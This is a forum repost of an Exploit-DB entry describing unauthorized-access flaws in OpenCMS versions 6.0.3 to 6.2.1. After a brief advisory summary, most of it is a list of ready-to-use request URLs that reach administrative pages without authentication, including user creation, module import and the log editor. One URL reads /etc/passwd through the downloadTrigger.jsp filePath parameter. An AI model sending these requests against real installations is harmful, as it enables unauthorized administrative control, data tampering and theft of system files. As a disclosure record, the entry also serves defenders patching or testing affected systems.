Exploit OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28278
Проверка EDB
  1. Пройдено
Автор
MEDER KYDYRALIEV
Тип уязвимости
WEBAPPS
Платформа
JSP
CVE
N/A
Дата публикации
2006-07-26
Код:
source: https://www.securityfocus.com/bid/19174/info

OpenCMS is prone to multiple unauthorized-access vulnerabilities because it fails to properly authenticate users when performing administrative tasks.

An attacker can exploit these issues to view, delete, and modify application data. This could aid in further attacks on the affected computer.

Versions 6.2.1, 6.2, 6.04, and 6.03 are vulnerable; prior versions may also be affected.

http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Flogfileview
http://www.example.com/opencms/opencms/system/workplace/admin/workplace/logfileview/downloadTrigger.jsp?filePath=/etc/passwd
http://www.example.com/opencms/opencms/system/workplace/editors/editor.jsp?resource=/index.jsp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts%2Fwebusers/new
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fdatabase%2Fimporthttp
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Fworkplace%2Fbroadcast
http://www.example.com/opencms/opencms/system/workplace/views/admin/admin-main.jsp?path=%2Faccounts/users
 
Источник
www.exploit-db.com

Похожие темы